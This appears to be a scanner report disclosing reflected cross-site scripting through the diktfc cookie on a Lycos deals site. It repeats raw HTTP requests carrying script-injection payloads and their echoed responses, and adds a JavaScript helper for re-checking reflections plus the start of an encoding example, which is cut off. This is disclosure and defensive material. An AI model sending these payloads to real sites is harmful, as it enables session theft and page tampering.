<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... mg src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6ec67"><script>alert(1)</script>28b95ad8bc4&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1ca8"%3balert(1)//8f632b01aa9 was submitted in the diktfc cookie. This input was echoed as b1ca8";alert(1)//8f632b01aa9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/lg-32-1080p-lcd-hdtv-for-399-414373 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab1ca8"%3balert(1)//8f632b01aa9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:26 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17715
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cc41"><script>alert(1)</script>85a55a54eb2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/lg-42-1080p-lcd-hdtv-for-479-414598 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2cc41"><script>alert(1)</script>85a55a54eb2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17736
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... mg src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2cc41"><script>alert(1)</script>85a55a54eb2&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb5d0"%3balert(1)//a5de5727a34 was submitted in the diktfc cookie. This input was echoed as eb5d0";alert(1)//a5de5727a34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/lg-42-1080p-lcd-hdtv-for-479-414598 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aeb5d0"%3balert(1)//a5de5727a34; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17684
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f448f"><script>alert(1)</script>e4b28d91281 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/logmein-ignition-for-iphone-for-20-413418 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af448f"><script>alert(1)</script>e4b28d91281; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18186
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... ="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af448f"><script>alert(1)</script>e4b28d91281&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f691"%3balert(1)//38cfa6531c3 was submitted in the diktfc cookie. This input was echoed as 6f691";alert(1)//38cfa6531c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/logmein-ignition-for-iphone-for-20-413418 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6f691"%3balert(1)//38cfa6531c3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:12 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18152
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa8ec"><script>alert(1)</script>6cc672e8440 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/mirror-s-edge-for-iphone-for-1-414300 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa8ec"><script>alert(1)</script>6cc672e8440; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:45 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17872
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa8ec"><script>alert(1)</script>6cc672e8440&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d87f"%3balert(1)//0adce29b43c was submitted in the diktfc cookie. This input was echoed as 4d87f";alert(1)//0adce29b43c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/mirror-s-edge-for-iphone-for-1-414300 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4d87f"%3balert(1)//0adce29b43c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:47 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17841
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56d85"%3balert(1)//7f46c76a176 was submitted in the diktfc cookie. This input was echoed as 56d85";alert(1)//7f46c76a176 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A56d85"%3balert(1)//7f46c76a176; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:03 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17716
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7362"><script>alert(1)</script>5134e7589ce was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7362"><script>alert(1)</script>5134e7589ce; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:01 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17692
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... //b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7362"><script>alert(1)</script>5134e7589ce&cj=1" alt="tracker" /> ...[SNIP]...
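A way to re-check reflections like the one above offline, added here as an example and not part of the scanner's output or the application's code: it takes the payload that was sent in the diktfc cookie and a response body, finds the scanner's marker pair, reports whether the probe came back unmodified, URL-decoded or HTML-encoded, and works out which syntactic context it landed in. The response fragments are constructed to mirror the snippets in this report (the encoded variant is hypothetical; the report shows no such response), and the 5-hex-prefix/11-hex-suffix marker shape is assumed from the payloads shown.

```javascript
// Added example, not part of the original scanner report. Re-checks a reflected-cookie
// finding offline: given the payload sent in the diktfc cookie and the response body,
// locate the scanner's random marker prefix/suffix, report how the probe came back
// (unmodified, URL-decoded, HTML-encoded) and classify the context it landed in.

function urlDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

function decodeEntities(s) {
  return s.replace(/&quot;/g, '"').replace(/&#x27;|&#39;/g, "'")
          .replace(/&lt;/g, '<').replace(/&gt;/g, '>').replace(/&amp;/g, '&');
}

// Count double quotes that are not backslash-escaped (a backslash skips the next char).
function countUnescapedQuotes(s) {
  let n = 0;
  for (let i = 0; i < s.length; i++) {
    if (s[i] === '\\') i++;
    else if (s[i] === '"') n++;
  }
  return n;
}

// Find the marker pair. The echoed probe is short, so a suffix hundreds of bytes away
// is a coincidental hex match rather than the reflection we are looking for.
function findMarkers(body, prefix, suffix) {
  let from = 0;
  while (true) {
    const start = body.indexOf(prefix, from);
    if (start < 0) return null;
    const end = body.indexOf(suffix, start + prefix.length);
    if (end >= 0 && end - start < 256) return { start, end };
    from = start + 1;
  }
}

// Classify where in the markup position `index` falls, looking only at what precedes it.
function classifyContext(body, index) {
  const before = body.slice(0, index);
  const lower = before.toLowerCase();
  const scriptOpen = lower.lastIndexOf('<script');
  if (scriptOpen > lower.lastIndexOf('</script')) {
    // Inside a script block: an odd number of unescaped " since the tag opened means
    // we are inside a double-quoted string literal.
    const js = before.slice(before.indexOf('>', scriptOpen) + 1);
    return countUnescapedQuotes(js) % 2 === 1 ? 'js-string-double-quoted' : 'js-code';
  }
  const lt = before.lastIndexOf('<');
  if (lt > before.lastIndexOf('>')) {
    // Inside a tag: an odd number of " means we are inside a quoted attribute value.
    const quotes = (before.slice(lt).match(/"/g) || []).length;
    return quotes % 2 === 1 ? 'html-attribute-double-quoted' : 'html-tag';
  }
  return 'html-text';
}

// Assumed marker shape, taken from the payloads in the report: 5 hex chars, the probe,
// then 11 hex chars.
function checkReflection(cookiePayload, body) {
  const m = /^([0-9a-f]{5})([\s\S]*)([0-9a-f]{11})$/.exec(cookiePayload);
  if (!m) throw new Error('payload does not look like <prefix><probe><suffix>');
  const [, prefix, probe, suffix] = m;
  const hit = findMarkers(body, prefix, suffix);
  if (!hit) return { reflected: false };
  const echoed = body.slice(hit.start + prefix.length, hit.end);
  const decodedProbe = urlDecode(probe);
  let form = 'transformed';
  if (echoed === probe) form = 'unmodified';
  else if (echoed === decodedProbe) form = 'url-decoded';
  else if (decodeEntities(echoed) === probe || decodeEntities(echoed) === decodedProbe) form = 'html-encoded';
  const context = classifyContext(body, hit.start);
  // A raw double quote reaching either double-quoted context is what lets the probe break out.
  const raw = form === 'unmodified' ? probe : form === 'url-decoded' ? decodedProbe : '';
  const breaksOut = raw.includes('"') &&
    (context === 'html-attribute-double-quoted' || context === 'js-string-double-quoted');
  return { reflected: true, form, context, breaksOut, echoed };
}

// Constructed response fragments mirroring the report's snippets (not byte-for-byte copies).
const COOKIE_BASE = '013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A';
const ATTR_BODY =
  '<html><head><title>deal</title></head><body>' +
  '<img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c15=' + COOKIE_BASE +
  'f7362"><script>alert(1)</script>5134e7589ce&cj=1" alt="tracker" /></body></html>';
const JS_BODY =
  '<html><head><script type="text/javascript">var diktfc = "' + COOKIE_BASE +
  '22e54";alert(1)//ca2c7b2c015";</script></head><body></body></html>';
// Hypothetical: the same pixel, but with the value HTML-encoded on output.
const SAFE_BODY =
  '<html><body><img src="http://b.scorecardresearch.com/p?c1=2&amp;c15=' + COOKIE_BASE +
  'f7362&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;5134e7589ce&amp;cj=1" alt="tracker" /></body></html>';

console.log(checkReflection('f7362"><script>alert(1)</script>5134e7589ce', ATTR_BODY));
console.log(checkReflection('22e54"%3balert(1)//ca2c7b2c015', JS_BODY));
console.log(checkReflection('f7362"><script>alert(1)</script>5134e7589ce', SAFE_BODY));
```

The `url-decoded` result on the script-string case is worth noting when triaging: the `%3b` in the Cookie header reached the page as a literal semicolon, so the server decodes the cookie value before echoing it, and a filter that only inspects the raw header would miss the breakout.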
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58697"><script>alert(1)</script>383e526ee99 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A58697"><script>alert(1)</script>383e526ee99; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:17 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18478
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A58697"><script>alert(1)</script>383e526ee99&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22e54"%3balert(1)//ca2c7b2c015 was submitted in the diktfc cookie. This input was echoed as 22e54";alert(1)//ca2c7b2c015 in the application's response: the %3b sequence was URL-decoded to a semicolon before the value was written into the page, so the double quotation mark terminates the string literal, the semicolon ends the statement, and // comments out the rest of the original line.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A22e54"%3balert(1)//ca2c7b2c015; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:19 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18514
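The fix the remediation notes point at is context-specific output encoding. The following is an added example in JavaScript, not the application's PHP code (the responses advertise X-Powered-By: PHP/5.1.6): it reproduces the two reflection shapes seen in this report, the c15= parameter of the tracker-pixel URL inside a double-quoted src attribute and a double-quoted string literal in a script block, beside hardened versions, and checks what a browser would actually send or assign in each case. The script-block markup is reconstructed (the report does not show that response body), and the scorecardresearch URL is trimmed to the parameters that matter. In PHP the attribute layer corresponds to rawurlencode() for the query parameter followed by htmlspecialchars() with ENT_QUOTES on the attribute value.

```javascript
// Added example, not the application's code. The report shows the diktfc cookie
// reflected into two contexts: the c15= query parameter of the tracker pixel URL, which
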